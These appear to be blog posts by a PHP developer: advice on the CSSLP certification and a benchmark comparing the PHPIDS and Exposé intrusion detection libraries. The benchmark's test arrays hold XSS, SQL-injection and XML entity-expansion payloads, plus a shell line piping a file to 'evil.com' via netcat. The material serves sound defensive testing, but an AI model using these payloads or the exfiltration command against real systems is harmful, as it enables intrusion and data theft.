Yes, I know. It has not been weekly. Since I last posted a lot of script kiddies populated my logs but not with anything all that interesting. Until today.
Category: security
In a rare occurrence for me, I am continuing my series of watching hack logs. You can check out all the episodes here: HOTW
For this episode I am pulling out an older record because I think it was rather clever.
Reviewing your logs is an important part of maintaining good system security. One log I watch on a constant basis is my IDS report (mainly because it constantly emails me). This is part one in (hopefully) an ongoing series of looking into what the script kiddies are up to, and how your server might be vulnerable.
On my last official day with Redport Information Assurance, I received confirmation of my Certified Secure Software Lifecycle Professional acceptance by (ISC)2. I am very grateful that Redport repeatedly covered my training and certification process. Alas, the story of our mutual separation will be a separate blog post.
Last week I passed the (ISC)2 Certified Secure Software Lifecycle Professional (CSSLP) exam. Here are some thoughts (not bound by the (ISC)2 NDA):
Cert Types
There are two classes of certification within the (ISC)2 family: member and associate. The only difference between the two is how many years of experience you have in the subject area. For full membership, you need 4 years of experience in at least 1 of 8 domains. If you have been doing devops for at least 4 years you will most likely be fine. If not, then you can go for the “associate” cert with the understanding that you have 5 years to gain that experience.
Summary: If the reason you are getting this cert is to have some letters on your resume, you might want to just go for the associate level. Who knows where you will be in 5 years.
Preparation
Option 1: Experience
This cert focuses on security aspects in the full lifecycle of “enterprise” application development (read: .Net/Java). Honestly, I do not believe that my 18+ years of PHP development would have prepared me to pass this test, even though I had several years of Java dev in the midst. There were too many questions on processes, Microsoft, Java, and acronyms. My three years in the infosec arena certainly helped, but did not cover all the bases.
Option 2: Official Training = High cost / Low risk
If you prefer live training, want to make dead sure you pass the test, and you have $2695 lying around, you can take (ISC)2’s official week-long trainings. They also have self-study classes from $99 up to $695. If your company wants to pay for this, awesome! Good luck with that. (ISC)2 also has CSSLP Flash Cards on their website, but in my case they only represented about 60% of the concepts on the exam I took.
Option 2: Job training portals = Low cost / Medium risk
Through my office, I was able to take the free FedVTE online CSSLP training. The 20-hour series of videos from CMU were great as an overarching review of security practices (when they say 20 hours they really mean 30+ hours). I feel that these trainings only provide a 60% solution. The information is great and highly recommended, but if your goal is passing, it won’t be enough by itself.
Looking back I also had access to the CSSLP resources on Skillport/Skillsoft. Make sure to check your company offerings.
Option 3: Read the book
There are several books out there purporting 90% passing rates. Looking at the comments on the latest official (ISC)2 offering will not give you much hope of passing. Not being too confident in the scope of the FedVTE Computer Based Test (CBT) class, I purchased Conklin’s CSSLP Certification All-in-One Exam Guide. Similar to the CBT, the material covered was broad but still did not cover all the areas of the test. The Microsoft-specific areas of the book were definitely helpful, coming from a Linux world.
Summary: Get Conklin’s book. If you are on a budget, use the official (ISC)2 training and books as a last resort.
Exam
Time: You have 4 hours to complete 175 multiple choice questions at a Pearson Vue center. I managed to finish in under 90 minutes, i.e. you have plenty of time to read each question carefully.
Content: As a CBT, each person’s exam should be different, so YMMV. Although the practice exams got me a bit scared, I did not encounter any “Which of these 4 ISO standards is the right one?” A fair number could be solved just by process of elimination. Having the years of experience certainly helped with a number of questions that the CBT and books overlooked.
Passing: I was surprised when I first looked at this test, as you only need a 70% to pass. Part of that may be the fact that the test is “a mile wide and an inch deep”.
Completion
Unlike certifications you might be used to, (ISC)2 and some others require you to be endorsed by someone who is an active (ISC)2 member in good standing. Hopefully you already know someone who is a member and can vouch that you have the required professional experience. In a couple weeks that should be me as well.
Prospects & Alternatives
A search today on some of the more popular boards reveals job postings for CSSLP professionals.
These numbers are not all that great, especially since I did not place a geographical restriction on the search.
There are many other security related certificates out there. CASP, CISSP, GWEB, and CEH are some of the more well known. Though some colleagues believe the value has been watered down in recent years, there are over 10x more jobs requiring a CISSP certificate. In many postings where CSSLP shows up, it is paired with one of these other more well known options.
Summary: If you are getting this to find a new job, other certs have more flexibility.
Value
Cost: Certs are not cheap. The CSSLP exam costs $595, plus, to keep your cert active, you must pay $100 and receive 30 Continuing Professional Education (CPE) credits per year. Training can be expensive as well. If your company is willing to pay for it, great! Out of pocket, ouch.
Visibility: This is not a well known cert. Despite the (ISC)2 website saying “CSSLP Named #1 Tech Cert that is Paying Off by Foote Partners” (for the first half of 2014), the job market says otherwise. Granted, it is no longer 2014 so perhaps it did pay off for 6 months.
Credits: Many certs these days require you to receive CPE credits to stay “active”. I plan on using the CSSLP as 50 CPE credits to renew my Security+ cert.
Usefulness: This cert material is useful, especially if you do not have a formal CS degree, or you are moving more toward leading teams or project management. It is an SDLC focused cert after all. There was a broad mix of useful security practices, “enterprise” situations, and supply chain considerations. At the very least, government recruiters like to see tons of certs on resumes.
Conclusion
It seems that certain people (especially government related entities) think the only way a person can know material is if they have paper proof. If you are looking to switch toward the security industry but lack the experience, I would check out the Security+ exam first. Several government agencies will accept that as proof that you know enough security to get in the door. If you already have 5+ years in infosec, go for the CASP or CISSP instead. They both have broader visibility. However, if you are a PHP developer and plan on working just for PHP companies, the ZCE is a much better place to start, with its lower upfront cost and no yearly maintenance fee.
I totally forgot to mention that I was published in the September edition of phpArchitect. Not only that, you can download my article for free. Head on over to https://www.phparch.com/magazine/2015-2/september/ to grab your copy. If you missed my php[world]15 talk, this will get you up to speed.
I had the privilege to present two talks at php[world]15 this week.
Inheriting a legacy app can be an adventure. Sometimes it can be much more than that. Trying to securely lock down a legacy app can be a much larger prospect. Here is a “quick” first pass recommendation.
Here is the slide deck for my talk on Basic Intrusion Detection With PHPIDS. If you attended, please provide feedback at Joind.in
Many years ago I stumbled upon PHPIDS and began incorporating it into all the systems that I built. I wanted to have an extra layer of intel into who was accessing my systems. Last year, at php[tek]13, @enygma started building Exposé, an alternate IDS, based upon the same rulesets as PHPIDS (perhaps motivated by my uncon talk). After making a few meager contributions myself, I decided to see how the two stacked up.
Setup
First, let’s get a clean copy of each library from GitHub using composer.
mkdir exposetest
cat > exposetest/composer.json <<COMPOSER
{
    "require": { "enygma/expose": "dev-master" },
    "minimum-stability": "dev"
}
COMPOSER

mkdir phpidstest
cat > phpidstest/composer.json <<COMPOSER
{
    "require": { "PHPIDS/PHPIDS": "dev-master" },
    "minimum-stability": "dev"
}
COMPOSER

cd exposetest && composer install
cd ../phpidstest && composer install

# get the default config and filters to where PHPIDS can read them
cp vendor/phpids/phpids/lib/IDS/Config/Config.ini.php vendor/phpids/phpids/lib/IDS/default_filter.xml .

# give PHPIDS somewhere to write its cache
mkdir tmp
cd ..
Once that is done, you will notice that exposé has three dependencies, whereas PHPIDS only has one. Currently, exposé follows the PSR-2 and PSR-3 standards, whereas PHPIDS does not. PSR-3 support makes a difference if you want to simply drop in your own logger instead of the default.
Test Scripts
Ok, back to testing. Let’s set up a basic set of possibly malicious strings for each library to parse, and use the recommended default install for each. A couple of the chosen test elements reference back to the default filter sets provided by PHPIDS, so we know something will trigger. Starting with the venerable PHPIDS, make an index.php in phpidstest:
<?php
// PHPIDS TEST RIG
require 'vendor/autoload.php';

/* testing set */
$data = array(
    '1'  => 'bah"></a>',                      // rule 1: html escape
    '21' => '%22+onMouseOver%3D%22alert%28',  // rule 21: basic XSS probings
    '3'  => '>aabbcc</abc>',                  // rule 3: finds unquoted attribute breaking injections
    '4'  => "<IMG SRC=javascript:alert('XSS')>",  // double-quoted so the inner single quotes parse
    '5'  => "<IMG SCR=javascript:alert('XSS')>",
    '6'  => '<iframe src=http://ha.ckers.org/scriptlet.html <',
    '7'  => '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    '8'  => '<<SCRIPT>prompt("XSS");//<</SCRIPT>',
    '9'  => '<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>',
    '10' => "';alert(String.fromCharCode(88,83,83))",
    // decimal HTML entities spelling out javascript:alert('XSS')
    '11' => '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>',
    '76' => 'union select from',
    'xmlexp' => '<!DOCTYPE root [<!ENTITY a "Ha !">]><root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>',
    'shell'  => 'foo || cat /etc/password | nc evil.com',
);

$loops = 1; // for later
$start = time();
for ($i = 0; $i < $loops; $i++) {
    foreach ($data as $key => $datum) {
        $s = time();
        $init = \IDS\Init::init('./Config.ini.php');
        $ids = new \IDS\Monitor($init);
        $result = $ids->run(array('POST' => array($key => $datum)));
        echo $key . ":\t" . $result->getImpact() . "\t" . (time() - $s) . "\n";
        clearstatcache();
    }
}
$end = time();
echo "Elapsed: " . ($end - $start) . "\n";
And now exposé. By default exposé wants to use a Mongo logger, but we can toss in the MockLogger instead. Once again make an index.php in exposetest:
<?php
// EXPOSÉ TEST RIG
require 'vendor/autoload.php';
require 'vendor/enygma/expose/tests/MockLogger.php'; // use a mock so we don't have to worry about Mongo

/* testing set (identical to the PHPIDS rig) */
$data = array(
    '1'  => 'bah"></a>',                      // rule 1: html escape
    '21' => '%22+onMouseOver%3D%22alert%28',  // rule 21: basic XSS probings
    '3'  => '>aabbcc</abc>',                  // rule 3: finds unquoted attribute breaking injections
    '4'  => "<IMG SRC=javascript:alert('XSS')>",  // double-quoted so the inner single quotes parse
    '5'  => "<IMG SCR=javascript:alert('XSS')>",
    '6'  => '<iframe src=http://ha.ckers.org/scriptlet.html <',
    '7'  => '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    '8'  => '<<SCRIPT>prompt("XSS");//<</SCRIPT>',
    '9'  => '<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>',
    '10' => "';alert(String.fromCharCode(88,83,83))",
    // decimal HTML entities spelling out javascript:alert('XSS')
    '11' => '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>',
    '76' => 'union select from',
    'xmlexp' => '<!DOCTYPE root [<!ENTITY a "Ha !">]><root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>',
    'shell'  => 'foo || cat /etc/password | nc evil.com',
);

$loops = 1; // for later
$start = time();
for ($i = 0; $i < $loops; $i++) {
    foreach ($data as $key => $datum) {
        $s = time();
        $filters = new \Expose\FilterCollection();
        $filters->load();
        $logger = new \Expose\MockLogger();
        $manager = new \Expose\Manager($filters, $logger);
        $manager->run(array('POST' => array($key => $datum)));
        echo $key . ":\t" . $manager->getImpact() . "\t" . (time() - $s) . "\n";
        clearstatcache();
    }
}
$end = time();
echo "Elapsed: " . ($end - $start) . "\n";
Comparing Threat Levels
Our first test run checks how exposé and PHPIDS rate each threat. We just run “php index.php” in each folder and compare. Simple.
Impact Results:
Test      PHPIDS   exposé
1         11       4
21        3        3
3         2        2
4         51       5     *
5         9        5
6         13       13
7         29       18
8         29       18
9         24       0     *
10        32       13    *
11        11       0     *
76        20       20
xmlexp    16       11    *
shell     10       10

(* = results differ significantly)
As a rule of thumb, I have set my impact threshold around 12. You would need to tune the value to your specific environment and requirements. As you can see here, there are 5 specific tests that differ significantly relative to my threshold:
- 4 & 11: obfuscation of an image source path
- 9 & 10: fromCharCode JavaScript obfuscation
- xmlexp: XML entity expansion
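The threshold above is only useful once it drives an action, and the PSR-3 point from the Setup section (drop in your own logger) is what makes that wiring clean. The following is an added example, not code from the original post or from either project: an engine-agnostic impact scorer around the two APIs already used in the test rigs, plus a two-level threshold (alert at 12 as tuned above, block at an assumed 36) applied to a constructed request. It assumes the composer layouts from the Setup section, that Exposé’s dependencies provide psr/log 1.x (so Psr\Log\AbstractLogger is available), and that the names ArrayLogger, ImpactScorer, ExposeScorer, PhpidsScorer and decide() are mine.

```php
<?php
// Added example (not part of the original post): threshold handling that does not
// care which IDS engine produced the impact score.
require 'vendor/autoload.php';

use Psr\Log\AbstractLogger;

// Minimal PSR-3 logger that keeps entries in memory. Assumed stand-in for whatever
// logger you would really hand to Exposé; requires psr/log 1.x AbstractLogger.
class ArrayLogger extends AbstractLogger
{
    public $entries = array();

    public function log($level, $message, array $context = array())
    {
        $this->entries[] = array('level' => $level, 'message' => $message, 'context' => $context);
    }
}

// Common shape for both engines, so the decision code is written once.
interface ImpactScorer
{
    /** @return int total impact for one request, shaped like array('POST' => array(...)) */
    public function score(array $request);
}

class ExposeScorer implements ImpactScorer
{
    private $logger;

    public function __construct($logger) { $this->logger = $logger; }

    public function score(array $request)
    {
        // Same calls as the exposé test rig above
        $filters = new \Expose\FilterCollection();
        $filters->load();
        $manager = new \Expose\Manager($filters, $this->logger);
        $manager->run($request);
        return (int) $manager->getImpact();
    }
}

class PhpidsScorer implements ImpactScorer
{
    private $configPath;

    public function __construct($configPath) { $this->configPath = $configPath; }

    public function score(array $request)
    {
        // Same calls as the PHPIDS test rig above
        $init = \IDS\Init::init($this->configPath);
        $ids  = new \IDS\Monitor($init);
        return (int) $ids->run($request)->getImpact();
    }
}

// Two thresholds: the alert level is the value tuned in the post (12); the block
// level (36) is an assumed illustrative value. Lower them for exposé if you want
// the same detection rate it gave PHPIDS-level impacts above.
function decide($impact, $alertAt = 12, $blockAt = 36)
{
    if ($impact >= $blockAt) { return 'block'; }
    if ($impact >= $alertAt) { return 'alert'; }
    return 'allow';
}

// Constructed request: one benign field plus test string 7 from the set above.
$request = array(
    'GET'  => array('q' => 'php ids comparison'),
    'POST' => array('comment' => '<<SCRIPT>alert("XSS");//<</SCRIPT>'),
);

$logger = new ArrayLogger();
$scorer = new ExposeScorer($logger);      // or: new PhpidsScorer('./Config.ini.php')
$impact = $scorer->score($request);
$action = decide($impact);

if ($action !== 'allow') {
    // Structured context keeps the score and the decision together in the log line
    $logger->warning('IDS impact above threshold', array('impact' => $impact, 'action' => $action));
}
if ($action === 'block') {
    http_response_code(403);
    exit;
}
printf("impact=%d action=%s logged=%d\n", $impact, $action, count($logger->entries));
```

Because both scorers expose the same score() method, swapping engines (or running both and keeping the higher impact) is a one-line change, and the thresholds can be tuned per engine without touching the request handling.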
Resource Test
Both of these basic tests run in the blink of an eye. Altering the $loops parameter to 1000, we start to see a bit of a speed difference between the two engines.
PHPIDS: 28s
exposé: 32s
In both cases, the script pegged one CPU. Memory usage did not vary significantly.
Both libraries churn through these simple example tests. How about a real world example?
Maliciousness
I have collected a few particularly nasty exploits recently. Some drop a shell code browser on your box. Others are more full featured with included SQL browsers. So, I decided to put PHPIDS and exposé to a more rigorous test. In this example I tested a 27k-character mystery string which would normally be converted with eval(gzinflate(base64_decode(EVILNESS))) into “lulz u r p0wnd” nastiness. Here are the results (using only 10 loops instead of 1000):
Library   Impact   Speed
PHPIDS    47       141s
exposé    18       26s
PHPIDS winds up being a lot slower on this known bad vector, yet it gives us a much higher impact level. This is primarily due to the PHPIDS “Centrifuge” which does additional black magic behind the scenes.
Conclusion
In the realm of an inline PHP IDS, we are left with the triad of sensitivity, selectivity, and performance. High sensitivity allows for better detection of threats. Higher selectivity (or spread in the impact levels) allows for better separation of threat risk. These two directly affect the performance/throughput. PHPIDS and exposé have differing sensitivity levels, meaning you may have to lower your threshold for the same amount of detection. The lower your impact threshold, the more noise (and email alerts) you will encounter. And finally, both will have a performance hit, but PHPIDS more so due to the higher sensitivity.
exposé is a great new entry to the very small world of PHP based intrusion detection. It is up to the latest PHP coding standards, will easily integrate with existing systems, and shows excellent promise. It has several other features of note, like an offline processing queue, that you should check out. If you tune your impact thresholds a bit lower, you can get roughly the same detection with some performance gain; however, it did miss the mark on a couple of specific threats. When it comes to larger and more complicated nastiness, PHPIDS’s Centrifuge provides a more thorough breakdown of the intrusion attempt.
If you are not already monitoring your logs, you need to start. Perhaps PHPIDS or exposé can move you in that direction. Happy coding, and keep your websites safe!